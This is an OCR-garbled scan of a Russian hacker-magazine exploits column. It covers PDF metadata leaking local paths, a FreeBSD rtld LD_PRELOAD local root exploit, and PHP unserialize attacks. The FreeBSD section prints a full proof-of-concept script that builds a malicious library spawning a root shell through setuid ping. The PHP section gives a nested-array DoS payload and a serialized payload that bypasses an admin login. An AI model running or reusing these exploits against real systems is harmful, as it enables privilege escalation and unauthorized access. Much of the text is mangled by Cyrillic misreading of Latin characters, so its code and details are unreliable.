спіс . паѵу . тіІ/паѵуспі/дгоирз/риЫіс/риЪ/Ьд/сІоситепкз/ 
Ьоситепк/с1о5 . рЬк 

кі1е:///С| /МеЪ_Ргозескз/ргозеск_кгіс1епк/пем_апка/ 
печлз1еккегз/с1о5 .Ькт 

Если ты соберешься сделать срез по общедоступным документам .рек 
(біеіурещек], то получишь количество в более чем 1 90.000.000 штук. 
Поверь, львиная доля из них страдаеттаким косяком. После взаимо- 
действия с Місгозок и АсіоЬе Зесигку Теат, стало ясно, что МісгозоО: 
планирует исправить это в Місгозоіі ІЕ 9, а АсіоЬе отреагировала, не 
назвав какие-либо даты кдействию. Какже выглядит метаописание в 
реалиях? 

есіа . доѵ/РВЕ/ЕВА_ѵо11 ; %2 ОІззиеІО . рЬк 

<х:хтртека хтіпз : х= " асІоЬе : пз :тека/ " х : хтркк= " АЬоЪе ХМР 
Соге 4.0-сЗІб 44.253921, Зип Оск 01 2006 17:14:39"> 

<гсИ : ЕВЕ хтіпз : гсік= "Ьккр : / /шт.ъгЗ . огд/1999/02/22-гсік- 
зупках-пз# " > 

сгсік : Везсгіркіоп гЬк : аЪоик= " " 

хтіпз : с!с= "Ьккр : / /ригі . огд/с1с/е1етепкз/1 . 1/ " > 

<сіс : когтак>арр1ісакіоп/рс!к</(іс : когтак> 
ссіс : сгеаког> 
сгсік : Зед> 

сгсік : 1і>Ьеѵ\ЩазЗ</гс1к : 1і> 

</гс1к : Зед> 

</сіс : сгеаког> 
ссіс : кік1е> 
сгсік : Аік> 

сгсік: 1і хті : 1апд= "х-сіекаиік " >кі1е : //С : \Воситепкз апсі 
Зеккіпдз\1еѵ7казз\Везккор\есіа печлзіеккегс/гсік : 1і> 
с/гсік : А1к> 

</с1с : кік1е> 
с/гсік : Везсгіркіоп> 

огедоп . доѵ/0МВ/0ЕМ/р1апз_кгаіп/дгапк_іпко/ ку2 0 0 9_ 
Ьздр_іпѵезктепк_:іизкікісакіоп.рс1к 

<х : хтртека хтіпз :х= " аскэЪе :пз :тека/ " х : хтркк= " 3.1-701 "> 
сгсік : ЕБЕ хтіпз : гс1к= "Ьккр : / /шт.ѵіЗ . огд/1999/02 / 22 -гЬк- 
зупках-пз# " > 

сгсік : Везсгіркіоп гЬк : аЪоик= " " 

хтіпз : рс1к= " Ьккр : / /пз . асіоЬе . сот/рсік /1.3/ "> 

ерЬк : Ргос1исег>АсгоЪак Візкіііег 7.0.5 (Мпскхлз ) </ 
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ЕХРЮІТ5 

РЕѴІЕМ 










ЕХРЮІТ5 

КЕѴІЕѴѴ 







ЕХРЮІТ5 

КЕѴІЕѴѴ 



Никіеп Оаіа аті МеШІаіа іп ЛгіоЬе РОГ Гііеь: 
РиЫісаііоп Кі$к$ аті Соипіегтеатгез 



Епіегргізе Арріісаііопз йіѵізіоп 
о? ІЬе 

Зузіѳтз апсЯ Ыеіѵѵогк Апаіузіз Сепіег (ЗМАС) 
ІпТогтаІіоп Аззигапсе Оігесіогаіе 



АНБ США КРАЙНЕ ОЗАБОЧЕНО ПРОБЛЕМОЙ 
БЕЗОПАСНОСТИ РйР— НТТР://ѴѴѴѴѴѴ.М5А. 
60Ѵ/ІА/_РІІ_Е5/АРР/Р0Р_РІ5К5.Р0Р 




рсбР : Ргосіисег> 

с/гсіі: : БезсгірБіоп> 

сгсБ: : БезсгірБіоп гсИ: : аЪоиБ= " " 

хтіпз :хар= "ІШРр : / /пз . асІоЪе . сот/хар/1 . О / " > 

<хар : СгеаБогТоо1>Р8сгірЦ5 . сііі Ѵегзіоп 5.2.2</ 
хар : СгеаБогТоо1> 

<хар :МосііЕуБаРе>2 009-03-18Т15 :07:10-07:00</ 
хар:Мосіі:ЕуБаЦе> 

<хар : СгеаБеБаБе>2 009-03 -18Т15 :07:10-07:00</ 
хар : СгеаБеБаБе> 

</т(1 ± : БезсгірБіоп> 

сгсіі : БезсгірБіоп гсіі : аЪоиБ= " " 

хтіпз :<бс= "ЬББр: //ригі . огд/сіс/еІетепСз/І . 1/ " > 

<с1с : 1огтаБ>арр1ісаБіоп/рс1:і:</с1с : 1огтаБ> 

«бс : БіБІе> 
сгсіі : АІБ> 

сгсБ: : 1і хті : 1апд= "х-сіеіаиір " >тІШт1 : Іііе : / /О : МетаХ 
зЪзр_2 009\с1га:ЕБ ідзХІу 2009 іпѵезБтепБ бизс/гсИ : 1і> 
</т(1 ± : АІБ> 



Как та к выходит? Попробуй сам проделать следующие действия. 

1. Открой .НТМ, ,НТМІ_, .МНТ на своем компьютере в осле (I Е] и зажми 
СМ+Р либо организуй печать. В качестве принтера выбери любой софт 
для работы с РОР (АбоЬе РОР/ СиІеРОР/ РгітоРОР) и жми «Ргіпі». 

2. Система спроситтебя об имени файла, не игнорируй запрос и вбей 
любое. На выходе ты получишьсгенеренный РОР'ник. Открой его в блок- 
ноте и сделай поиск по сигнатуре «біе://». 



ЕХРЮІТ 



|Замечено, что все это грозиттолько при использовании печати 
на своих локальных файлах из-за включения в них подобной инфор- 
мации. Еслиты скачаешьфайл из интернета, просто распечатав его, 
то ничего плохого не случится. После ряда экспериментов стало ясно, 
что таким делом грешат не все софтины для работы с РОР, а именно: 
ЬиІЕір, рсКсгеаІюг. Крометого, рекомендую ознакомиться с одной из 
статей в корпоративных информационных блогах АбоЬе ( Ыоаз.абоЬе. 
сот/асгоЬаі/2009/02/ргорегІѵ гетоѵіпа зепзібѵе іп.ЫтІ ). которая 
называется «Ргорегіу гетоѵіпд зепзібѵе іпіюгтаЬоп». Она посвящена 
непосредственномуудалению критичной информации издокументов 



РОР. Начиная с восьмой версии АсгоЬаІ (АсгоЬаІ 8, АсгоЬаІ 9], появилось 
две новыхутилиты (Вебасіог, Сопіепі Оріітгег], целиком и полностью 
направленных на выделение и удаление подобной инфы изтела доку- 
ментов. 

Другой документ ( Ьеір.абоЬе.сот/еп Ц5/АсгоЬаі/9.0/Ргоіез5Іопаі/ 
ѴѴ57Е9ЕА147-1 ОЕЗ-4391 -9СВ6-6Е44ЕВРА8856.ѵу.ЬітІ) описывает 
методику удален ия скрытой от глаз пользователя информации, которая 
включает в себя: 

• метаданные; 

• файловые приложения (РОЕ позволяет добавлять кдокументу аттач- 
менты, посмотреть их можно с помощью Ѵіеѵѵ-> Ыаѵідаііоп РапеІ-> 
АііасЬтепіз); 

• аннотационные записи и комментарии (Ѵіе\л/-> Ыаѵідаііоп РапеІ-> 
Соттепіз); 

• поля форм (всевозможные поля для подписей, вставок, индексов могут 
бытьзаведомозаполнены или добавлены комментариями); 

• скрытый текст (конечно, он не настолько скрытый, чтобы его не заме- 
тить, но это бываетзатруднительно (всевозможные цветовые игры, слои 
фона); 

• удаленныетекстовой и графический контент. 




ЛОКАЛЬНОЕ ПОВЫШЕНИЕ ПРАВ В 
РВЕЕВ50 



[ЗЛЕЯ Итак, заявлен новый способ повышения привилегий! 
Установка руткитов теперь обзавелась еще одним вариантом. 
Автором боевого эксплоита является Кіпдсоре (он же ІЧікоІаоз 
Рапдоз). Уязвимость была найдена в Рип-Тіте ипк-Ебііог(гіІб). 
Вообще, гиб не позволяет использовать опасные переменные 
окружения, вроде Ю_РРЕЕ0А0 при исполнении зеіидіб-бинар- 
ников (ріпд.зи). С помощью специального трюка этот процесс 
может быть нарушен. 

Вііб располагается в ІіЬехес/гіІб-еІі/гіІб.с. Переменная Ю-РВЕЕОАВ 
указывает гиб на использование какой-либо дополнительной библи- 
отеки (зЬагеб оЬ)есі), которая будет подгружена. Как правило, это дело 
игнорируется при запуске 5111 О/ЗОЮ-приложений. Рассмотрим этот 
момент более детально: 
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іипс_рі г_іуре 
_гыь(еы_аььг *зр, 

іипс_ріг_іуре *ехіі_ргос, 
ОЬ:і_Епігу **оЬ^р) 

{ 

ЕІі_Аихіпіо *аих_іпіо [АТ_СОШТ] ; 
іпі і; 

ігизі = ! іззеіидісі ( ) ; 



Іі іЬе ргосезз із іаіпіесі, іЬеп ме ип-зеі іЬе Ьапдегоиз 
епѵігоптепі ѵагіаЫез . ТЬе ргосезз ѵ/ііі Ье тагкесі аз 
іаіпіесі ипііі зеіиісІ(2) із саііесі. Іі апу сЬіісі ргосезз 
саііз зеіиіс1(2) ѵге сіо поі мапі апу іиіиге ргосеззез іо 
Ьопог іЬе роіепііаііу ип-заіе ѵагіаЫез. 

*/ 



іі ( ! ігизі ) { 
ипзеіепѵ (ЬБ_ 
ипзеіепѵ (ЬБ_ 
ипзеіепѵ (ЬБ_ 
ипзеіепѵ (ЬБ_ 
ипзеіепѵ (ЬБ_ 
ипзеіепѵ (ЬБ_ 

} 



" РКЕЬОАБ " ) ; 

" ЫВМАР " ) ; 
"ЫВКАКУ_РАТН" ) ; 
"ЫВМАР_БІЗАВЬЕ" ) ; 
" БЕВШ " ) ; 

"ЕЬР_НШТЗ_РАТН" ) ; 



/* Кеіигп іЬе ехіі ргосесіиге апсі іЬе ргодгаш епігу 
роіпі */ 

*ехіі_ргос = гі1сІ_ехіі; 

*оЬ}р = оЬ^_шаіп; 

геіигп ( іипс_ріг_іуре) оЬ^_шаіп->епігу ; 

} 





*епѵМсіх = псіх ; 

геіигп (епѵѴагз [псіх] .паше + пашеЬеп + 
зігеоі ( "=" ) — 1) ; 

} 

} 

еізе іі ( ( ! опІуАсііѵе I I епѵѴагз [псіх] .асііѵе) && 
(епѵѴагз [псіх] .пашеЬеп == пашеЬеп && 
зігпстред (епѵѴагз [псіх] .паше , пате, пашеЬеп) ) ) { 
*епѵКкіх = псіх; 

геіигп (епѵѴагз [псіх] .ѵаіие) ; 

} 

геіигп (ШЬЬ) ; 



} 



Соответственно, если это дело оплошает, результат от выдачи ипзеіепѵ 
получится с ошибкой, и, в итоге, Ы-переменная удалена не будет. Код 
эксплоита успешно демонстрирует помещение вредоносного кода в 
збагесі ІіЬгагу и его устройство в переменной окружения. 



ЕХРЮІТ 



А вот полноценный РоС (естественно, лишь для ознакомления): 

# ! /Ьіп/зЬ 

есЬо ** ЕгееВЗБ Іосаі гООі гегосіау 

есЬо Ьу Кіпдсоре 

есЬо ЫоѵешЬег 2 009 

саі > епѵ.с « _ЕОЕ 

#іпс1исіе <зіс!іо.Ь.> 

таіп ( ) 

{ 

ехіегп сЬаг **епѵігоп; 
епѵігоп = (сііаг**)та11ос (8096) ; 



Соответственно, если бинарник имеет5Ш0/$6Ю-бит, с него будутсняты 
некоторые Ы_переменные окружения с помощью функции ипзеіепѵ 
(згс/іі Ь/Іі Ьс/зісІ Іі Ь/деіепѵ.с) . Проблема заключается именно в этой функ- 
ции. Деактивация нужной переменной происходите помощью предва- 
рительного вызова іі псіепѵ, который как раз и может оплошать: 



епѵігоп[0] = (сЬаг* )та11ос (1024) ; 
епѵігоп[1] = (сЬаг*)та11ос(1024); 

зігеру (епѵігоп [1] , " ЬБ_РКЕЬОАБ=/ітр/ѵ\ЮОі . зо . 1 . 0 " 
ехесі ( " /зЬіп/ріпд" , "ріпд" , 0); 



іі ( і і псіепѵ (пате , патеЬеп, &епѵБсіх, ігие) ! = ШЬЬ) { 

епѵѴагз [епѵБсіх] .асііѵе = іаізе; 
іі (епѵѴагз [епѵШх] .риіепѵ) 

гетоѵе_риіепѵ (епѵШх) ; 

геЬиі1сі_епѵігоп (епѵАсііѵе — 1) ; 

} 

Исходный код вызова ііпсІепѵО: 

зіаііс іпііпе сЬаг * 

ііпсіепѵ (сопзі сЬаг *пате, 

зіге_і патеЬеп, 
іпі *епѵШх, 

Ъооі опІуАсііѵе) 

{ 

іпі псіх; 

/* Еіпсі епѵігоптепі ѵагіаЫе ігот епсі оі аггау (тоге 
іікеіу іо Ье асііѵе) . А ѵагіаЫе сгеаіесі Ьу риіепѵ із 
аЫауз асііѵе ог іі із поі ігаскесі іп іЬе аггау */ 



_ЕОЕ 

дсс епѵ.с -о епѵ 

саі > ргодгат.с « _ЕОЕ 

#іпс1исіе <ипізісі.Ь> 

#іпс1исіе <зісііо.Ь> 

#іпс1исіе <зуз/іурез . Ь> 

#іпс1исіе <зіЬ1іЬ.Ь> 

ѵоіеі _іпіі ( ) { 

ехіегп сЬаг ** епѵігоп ; 
епѵігоп=№ЛіЬ ; 

зузіет( " есЬо АЬЕХ-АБЕХ; /Ьіп/зЬ" ) ; 

} 

_ЕОЕ 

дсс -о ргодгат.о -с ргодгат.с -ІРІС 

дсс -зЬагеЬ -VI 1 , -зопате , члЮОі .зо.І -оотООі.зо.І.О 

ргодгат.о -позіагііііез 

ср члЮОі . зо . 1 . 0 /ітр/ѵ^ООі . зо . 1 . О 

./епѵ . 



іог (псЬс = *епѵ№±х; псіх >= 0; псіх--) 
іі (епѵѴагз [псіх] .риіепѵ) { 
іі ( зігпетред (епѵѴагз [псіх] . пате , пате, патеЬеп)) { 



ТАР6ЕТ5 



| Эксплойтуспешно работаетна 7.1 , 7.2 и 8.0 релизах РгееВСй. 
Обладателям РгееВСй 6.3-ПЕІ_ЕА5Е и ЕгееВВй 4.9-РЕЕЕА5Е бояться 
нечего, т 
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■ ■ МАГ ІССЭ 884888, НТТР://ѴѴАР-СНАТ.Ри 




РНР 

И ВОЛШЕБНЫЕ 

МЕТОДЫ СЕРИАЛИЗАЦИЯ 

РНР-ОБЪЕКТОВ ГЛАЗАМИ ХАКЕРА 



НА ПОВЕСТКЕ ДНЯ - РАЗБОР ПРЕЗЕНТАЦИИ СТЕФАНАЭССЕРА «5Н0С- 
КШС ИЕѴѴЗ ІИ РНР ЕХРЮІТАТІОИ», КОТОРУЮ ОН ПРЕДСТАВИЛ ВО 
ВРЕМЯ КОНФЕРЕНЦИИ РОС2009 В СЕУЛЕ 5 НОЯБРЯ. ИССЛЕДОВАНИЕ 
В БОЛЬШЕЙ СТЕПЕНИ НАПРАВЛЕНО НА БУДУЩЕЕ. ТАК КАК ПОКА 
НЕМНОГИЕ ПРОГРАММИСТЫ СТРЕМЯТСЯ ВОСПОЛЬЗОВАТЬСЯ ВСЕМИ 
ПРЕИМУЩЕСТВАМИ «ВОЛШЕБНЫХ МЕТОДОВ» РНР 



КРАТКИЙ ЛИКБЕЗ 

Для начала тебе стоит уяснить, что же это за 
«волшебные методы», для чего они нужны и 
в каких случаях применяются. 

Мадіс МеТбобз — это, в дословном пере- 
воде, Магические Методы, которые заре- 
зервированы в рбр и всегда начинаются 
с двойного подчеркивания « » (создате- 

лями рбр не рекомендуется называть свои 
собственные методы, начиная с этого 
самого « », если ты хочешь использо- 

вать некоторую волшебную функциональ- 
ность). 

Вот список таких методов: 

сопзкгисС 

сіезкгиск 



саіі 

саІІЗкакіс 

дек 

зек 

іззек 

ипзек 

зіеер 

члгакеир 

коЗкгіпд 

зек_зкаке 

сіопе 

іпѵоке 

Теперь немного подробнее о каждом методе. 

1. « сопзігисі» и « сіезіхисі» — самые 

популярные методы, которые реализуют 
базовые понятия объектно-ориентированного 



программирования: конструктор и деструктор; 

2. « саіі», « саІІВіабс», « деі» и « зеі» — 

методы, связанные с перегрузкой обращений 
как к свойствам, так и к методам. Методы 

« деШ» и « зеШ» вызываются при уста- 

новке и получении значения свойства, а 

методы « са НО» и « саІІЫабс» — при 

вызове метода. Стоит заметить, что эти маги- 
ческие функции будут вызываться только и 
исключительно в том случае, если запрошен- 
ные метод или свойство не существуют; 

3. « іззеі» — метод, срабатывающий при 

вызове функций етрІуО или іззеШ на несуще- 
ствующем или недоступном свойстве класса; 

4. « ипзеі» — срабатывает при вызове функ- 

ции ипзеШ на несуществующем или недо- 
ступном свойстве класса; 
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5. « зіеер» и « ѵѵакеир» — методы, которые вызы- 

ваются только из функций зегіаііге и ипзегіаііге 

соответственно. Метод « зіеер» будет вызван сразу 

при применении к объекту функции зегіаііге, а метод 
« ѵѵакеир» — при применении ипзегіаііге. В насто- 

ящий момент методы применяются для сохранения 
текущего состояния системы с последующим вос- 
становлением данного состояния (например, коннект 
к базе); 

6. « ІюЭіхіпд» — метод, с помощью которого можно обра- 

щаться к классу как к строке (например, с помощью ргіпі: 
или есбо); 

7 . « 5еІ_5І:а1:е» — метод, который вызывается для 

классов, экспортирующих значения свойств функцией 
ѵаг_ехрогШ; 

8 . « сіопе» — вызывается при клонировании объекта 

(введен для использования из-за того, что объекты в 
рбр5 и выше передаются по ссылке); 

9 . « іпѵоке» — вызывается при попытке использовать 

объект в качестве функции. 

В рамках статьи нас интересуют 3 описанных метода: 

« сіезіхисі», « ѵѵакеир» и « ІюЭігіпд» — именно они 

могут вызываться при автозагрузке объектов из функции 
ипзегіаііге. 

МНОГОСТРАДАЛЬНЫЙ ШЕР^У/Е 

Немного отступимся от основной темы и рассмотрим 
некоторые особенности и варианты эксплуатации функ- 
ции ипзегіаІігеО, которые отметил сам Эссер. 

1. Пример от Стефана, в котором наглядно описаны все 
поддерживаемые функцией типы данных: 



а : 3 : {і:5;0:9: " ТезССІазз " : 2 : { з : 7 : " \0*\0рго1" 

; і : 12 3 ; 3: 

15 : " \ 0ТезСС1азз\ 0рго2 " ; і: 123 ; } 

і : 123 ; Ь : 1 ; і : 1337 ; а : 3 : {.І :0;Ы;і: 

1 ; і : 5 ; і : 2 ; а : 1 : { і : 0 ; О : 10 : "ОСЪегСІазз " : 4 : { з : 16 
: " \0ОЫтегС1азз 

\0рго1 " ; з : б : "АВСБЕЕ" ; з : 16 : " \ ООЪЪ.егС1азз \ Орго 
2 " ; з : 3 : "АВС" ; 3 : 

16 : " \ООЫтегС1азз\ОргоЗ " ;К: 2 ; з : 16 : " ХООЫтегСІа 
зз\0рго4 " ; N ; } } } } 

Здесь в сериализованной строке содержатся следующие 
данные: 



ПРИМЕР РАБОТЫ ЭКСПЛОЙТА 




Ли Ллісйоп гнити* с.ці>*2Жіс_ дір-г и[№ ^ здз. Іа^іллд. 

апй с№т аг* гладка* Іп РНР йам*Е. Уои снппоі Ііа'ле ЛячИот «ЛЬ Йі*м пате* т ллу оі уоиг иліеи- уои «апі Йіа таре 

(ІтеНопліЕу ю&осіаігй *ііЬ іЬт. 



РНРг«?гѵ« ай АхіДил ;№№д мЦі _ » и Ъ г*«нттепй«і ЙЧІ уоу гвді УК Аі-ч:№ паям* імт _ т РНР 

уои кале 50лпе йесителіай ящдіе Атеа&п&пі^.. 



а/еер агмі ъѵэк&ир 

■запаІігаМ гйкска іГ уаіг сіан Ьле в ЛтсИал иіЙі Йч твдіе пат* ъіеер. 1Т и> Г ОИаН ЛжхИоп е *х*оЛ*й рсіог Со апу іеПаІгаСюп. 11 сап гіевп ир 

Йж оЬдасІ апй Із 5црро5*й Іо гаЫт ап агтау шві Йм- пвгтт*5 оТ а» ѵаплЫ«. оГ ЙиІ оЬ^есі ЙіаС зйтаьій Ь* мгаіеей. II ІН* гтгейжй &мегѴ С г*Шт 
лпуйііпд Йжп М1Я.І Е 5МІлІ2*й апд Е ЛОЛ СЕ іе ікивй. 

ТТк П1чЛЙ*Й и С* ОГ_іЛМ№ 18 Ю йОПУЛІС іМГгітд йоіа ОТ раГРОпП йПІаГ *аЛиО МЙ5.. АЙО, ЙЧ АлЧіюп № иіаИі I* уои ГЧУ* ѵсГу Іалр оЬ^СВ 
чНсЬ ЙО №1 ГМ*Й Ю Ь* 4ІІМІ МнПр1*ЕЙу. 

Сотгегегіу, ип5*л^гЯ ’і (йчека Рот От* рситило* оР а ІипсОоп »ІЙі Йч ггиц^я: пат* ѵглАецр, II ргмапЕ. Йтв ІигсНоп сап гасоггеНисС апу 

Пвыиігск ЙіаС йі* ОЬ]*сІ тлу На»*. 

ТЬе ШІепсІесІ и&* оР ѵ/акяцр Ік Ш гыЕІаЪВзІі апу йаСЛЬава соплвсОопа Ймі тау Ьаѵе Ьевп (ові йигти Е«1аІгаИопі апй регіогті ойиг 

МАГИЧЕСКИЕ МЕТОДЫ В РНР 



Ъ : 1 ; //Ьооіеап 

і : 5 ; //іпРедег 

3:5: " АВСБЕ " ; //зРгіпд 

а : 3 : { . . . } //аггау 

0:9: "ТезЪСІазз" : 1 : { . . . } //окдесР 

В примере ты можешь заметить, возможно, неизвест- 
ные тебе форматы записи переменных: «\0*\0рго1» и 
«\0Те5іСІа55\0рго2». «Что это за нулл-байты в именах 
переменных?» — спросишь ты. Заходим на ѵѵѵѵѵѵ.рЬр. 
пеі/тапиаІ/епЛипсбоп.зегіаЦге.рЬр и читаем плашку с 
«ІЧоІе»: 

ОЬдесЩ'з ргіѵаСе тетЬегз Ьаѵе Ыге сіазз 
пате ргерепсіесі Со Рііе тетЬег пате; 
ргоСесРесЗ тетЬегз Ьаѵе а 1 * 1 ргерепсіесі Со 
РЬе тетЬег пате. ТЬезе ргерепсіесі ѵаіиез 
Ьаѵе пиіі ЬуРез оп еіЪІтег зіеіе. 

Это нехитрое пояснение означает, что при сериализации 
объектов закрытые члены класса должны предваряться 
именем класса, обрамленным нулл-байтами, а защищен- 
ные объекты должны начинаться с «\0*\0». 

Также поясню, что в рбр5 существуют 3 дескриптора для 
осуществления контроля над доступом к переменным и 
методам: 

• риЫіс (открытый): метод или переменная доступны из 
любого места в коде; 

• ргіѵаіе (закрытый): закрытые методы или переменные 
доступны только внутри класса; 

• ргоіесіесі (защищенный): защищенные методы или 
переменные доступны только внутри класса, где они были 
объявлены, а также из его производных классов. 

Данные особенности сериализации объектов означают, 
что при десериализации мы можем перезаписать даже 
защищенные переменные внутри вызываемого класса! 

2 . Далее Эссер приводит пример легкой ОоЗ-атаки с 
помощью описываемой функции: 



а : 1 | |а : 1 : {а : 1 : {а : 1 : {а : 1 : {а : 1 : {а : 1 : {а:1: {а:1 
: { а : 1 : {а: 

1: { а : 1 : { а : 1 * { а : 1 : {а : 1 : {а : 1 : { а : 1 1 (а : 1 : {а : 1 1 { 
а : 1 : { а : 1 : 

{а : 1 : { а : 1 : { а : 1 : { а : 1 ; {а:1: {а:1: {а:1: {а:1: {а: 
1 : { а : 1 : 

{а:1:{а:1:{а:1:{а:1:{а:1:{а:1:{а:1:{а:1:{а: 
1 : { а : 1 : 

{а:1:{а:1:{а:1:{а:1:{а:1:{а:1:{а:1:{а:1:{а: 




НТТР://ѴѴѴШ 

I ■ 

> Ііпкз 

• рбр.пеДгегіаІіге — 

все о функции 
зегіаііге. 

• рбр.пеі/ипзегіаііге — 
все о функции 
ипзегіаііге. 

• рИр.пеі/тапиаІ/еп/ 
Іапдиаде.оорб.тадіс. 
рбр — магические 
методы рбр. 

• рбр.пеі/оорб. 
оѵегіоабіпі —пере- 
грузка объектов в 
рбр5. 

• рЬр.пеі/тапиаІ/ 
еп/іапдиаде.оорб. 
аиІоІоасІ.рЬр — авто- 
загрузка объектов в 
рбр5. 

• — 

официальный блог 
Стефана Эссера. 

• зизрекі.огд/ 
боууп[оабз/РОС2009- 
ЗЬоскіпдЫеѵѵзІп 
РНРЕхрІоіІабоп.рсІ — 
презентация Стефана 
на РоС2009. 

• зизрекі.огд/ 
боуѵп[оабз/Р5509-ѴѴе 
ЬАррІісабопРігеѵѵаЦВ 
ѵраззезАпсІРНРЕхрІо 
ііз.рсіі — презентация 
на Р5509. 

• роуѵегоіеоттипііу. 

пеі — официальный 
сайт конференции 
РоС. 
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взлом 



<?р1»р 

с1і«і А ( 

рііі’ііи репе - 1; 

риЫіс (ипаі№ ) { 

У 

} 

// рлвеі.ріір: 

ІпсІиіІеГсІііи.йк 1 '); 

Іі - п*м Д; 

іі - іегіаіі.: ё ( $»3 ; 

іігогй $5 5ыи&Ч»?ге мііегс рл^.рНр ели ^і»<1 Ц* 

І І1 С_р(!І _С ФЛ* еи 1 5 { 4 3* ОГ * ' , ^5 р 

N р*в*2.рЬр: 

// И& пвдеМ *о#* илнгІіЦ:* га ѵ-горк рм орег 1 ч . 

іие Іи гіг( "с 1»^ . іпс ** ) ; 

$5 ■ 'Г І1е_бег_с сиііепг к ( 1 $1оге ‘ > ; 

5а - йіивг1і11і«<$$); 

/ / пои іі5« (Не (иііегіяі ;1иэи_апеО а? гН« 5а вЬ}«( , 

$а - * зііоы^йг е{ ) ; 

ПРИМЕР СЕРИАЛИЗАЦИИ ОБЪЕК- 
ТОВ С РНР.ЫЕТ 



1 : { а : 1 : 

{а : 1 : { а : 1 : { а : 1 : { а : 1 : { а : 1 : {а:1: {а:1 
: { а : 1 : {а: 1 г {а:1: 

{а : 1 : {а : і : {а:1: { а : 1 : { а : 1 : { а: і : { а : 1 
: { а : 1 : {а:1: {а:1: 

{ а : 1 : {а : 1 : {а:1: { а : 1 : { а ; 1 : { а : 1 : {а:1 
: {а:1:{а:1:{а:1: 

{а : 1 : { а : 1 : {а : 1 : {а : 1 : { а ; 1 ; { а : 1 : {а ; 1 
: {а:1:{а:1:{а:1: 

{а : 1 : {а:1: { а : 1 : { а : 1 : {а:1: { а ; 1 : {а:1 
: { а : 1 : {а:1: {а:1: 

{ а : 1 : { а : 1 : { . . . 

3. И, наконец, известная тебе по древ- 
нему р И р В В 2 уязвимость с использо- 
ванием == вместо === при сравнении 
строк и типов данных, проявляющая 
себе через функцию ипзегіаііге. 
Уязвимый код: 

<?рЬр 

$с!ака = ипзегіаііге ( $аико1одіп) ; 

І'ЗЕ' ( $с!ака [ 1 изегпате ’ ] = = 

$а<Элііп1Тате && $с!ака [ 1 раззѵгогсі 1 ] = = 
$а<ЗтіпРаззѵ\гогс1) { 

$а<±піп = Сгие; 

} еізе { 

$асітіп = Таізе; 

} 

?> 



а: 2 : {з : 8 : "изегпаше" ; Ь : 1? з : 8 : "разам 
ог<3 " ; Ь і ! ; } 

Здесь имя пользователя и пароль устанавли- 
ваются в булево Тше, а затем скрипт пускает 
нас в админку :). 

ХИТРЫЕ КЛАССЫ 

Настало время вернуться к нашим баранам. 
Итак, представь, что у нас имеется некая 
СМ5, в которой существует некий класс, где 

присутствует метод безТгисТ ( ѵѵакеир 

и ТоЗТгіпд мы рассмотрим немного позже и 

менее подробно, так как они пока что очень 



редки в реальной жизни, хотя все описы- 
ваемое в полной мере может относиться и к 
ним]. 

Вот исходник этого класса: 

<?рЬр 

сіазз СезкСІазз 
{ 

ргокескеЬ $1од_Ті1е= 1 Іод 1 ; // 

файл логов 

ргіѵаке $ракЪ. = //путь к 

файлу логов 

ѵаг $1од_с1итр; //содержимое 
лога 

//деструктор класса 

Типскіоп Ьезкгиск ( ) 

{ 

//сохраняем лог 

$Т = Тореп ( $кЬіз->ракЬ . $Шз->, 
1од_^і1е . 1 . кхк 1 , 1 м ’ ) ; 

Тмгіке ( $Т , $кЬіз->1од_с1итр) ; 
Тсіозе ( $Т ) ; 

} 

} 

?> 

Использоваться данный класс может, напри- 
мер, так: 

<?рЬр 

$кезк = пем ЬезЬСІазз ( ) ; 
$кезк->1од_с!итр = кіте(); 
ипзек ($кезк) ; 

?> 

В данном примере сначала вызывается класс 
іезЮІазз, затем переменной $ Ьд_б и тр уста- 
навливается значение текущего времени, и 
вызванный объект уничтожается. 

Рассмотрим, что в это время происходит с 
самим объектом: 

1. Инициализируется класс (если бы суще- 
ствовал магический метод сопзігисі, вызы- 

вался бы именно он); 

2. Устанавливаются защищенная и закрытая 
переменные $1од_б1е и $раіЬ, в которых 
содержатся имя файла логов и путь к нему; 

3. Устанавливается внешняя переменная 
$1од_битр — то, что мы будем записывать в 
лог-файл; 

4. Вызывается деструктор класса сіезіхисі:, 

во время чего в наш лог-файл Іод.М записы- 
вается текущее время. 

Как видишь, у нас получился неплохой при- 
мер логгера :). 

ЭКСПЛУАТИРУЙ ЭТО! 

Теперь настало время представить, что опи- 
санный выше класс уже включен в код нашей 
СМ5 и что вызываемые из базы данных поля 
профиля пользователя (или любые другие 
поля] проверяются на сериализацию. В 
качестве примера подойдут функции из уже 
известного тебе ѴѴогсІРгезз'а: 



Зреакіпд а* РОС 2009 

І.рГ.ггі., МЛ 5М4 ь у І4ІФГ 

^ — 6 - -ф ■ 

т ч [« 1і* Си» ЯуяЫі» 




ТН« чсат [ ніІІ геЪігп Ьо РдиіЕГ СрвптінііЕу гп 5«аиІ ляй ргеівпі а юя:пп аЬпиЕ 
^ р!№ ОГ №в *ІІ * • ЫбІІіЬбП РШ> «ПО 14ГѴ4П. «П|Г ІПІ 

■ бІвсНѣлЕ Елік І мП лім Лв-гаюпіЕглІ* Кэп Іо (ігмі иікізиві нзЙв вхныСнп ѵуіпеглЬч'-іім- 

■ (іа» 14 (дагчі лВіеЬі ЩгеищЬ «ррісяЖ» Ячн иН», 

$еиіеп: Мл-из іп РНР ІнрІвПіиоп 

ЙепмЕв сиіл ■віисиігоп ѵиЬпвгдЬіІгРлі іеі тмівлі РМР йррііовАіопі Квѵв 
Ы-МГЛ4 №йг+ фПі-іуІі, (4 Ііой Лив № 

■лгіЛ піСіе айіарвюп пі ЁиНояп, тнсЬ лнІіслСіол Ьгсѵ/аЯі лгкі сйіег РМР 
ИВѴІІЧімріт ЬіпЛмІм», ЕД. «Ь* СІ№ 9І ГѴІМвІ* И» ІІКІиКП ѵ^(#іЫІІЙ*« |( 
рглсіклііт йелЛ ш толст РИР Іп((а11в1і[м 1 із^ 

ТЬ» ИІ ЙІПЫГІІІГ4(* Нои 4 Т*І| СИв* «Г РНР *рр!!ы(івй 

ѵиІпЕ-глЪіІіЬві ІМвС л иіЛаІѵ Ьвік-ѵсй [□ Ьо л ОоЗ *иІп«глЬіІіІт аліу, сап гііиЙ 
л Р-НР вен* «исиМй. РѵіЬігтап» И миІІ Ь« ^«пап*Ѵ*и^ 

ііои ліілскі ап РМР афрІісаЬшпі сап Ье Ьісігніеіі іЬгоидН иеЬ аррііелйпп 
(ічіувін ьь* Ы-івяіМ) «ш, Й* т^івЛ* гиія- «чііч. 

івй ЬіЛ гіпЕ I в а в-1. па п>П (л> а а Інік аС. ІІНе гесе пЙт іпЛгаЙисаЛ ртпІЕйіолв 
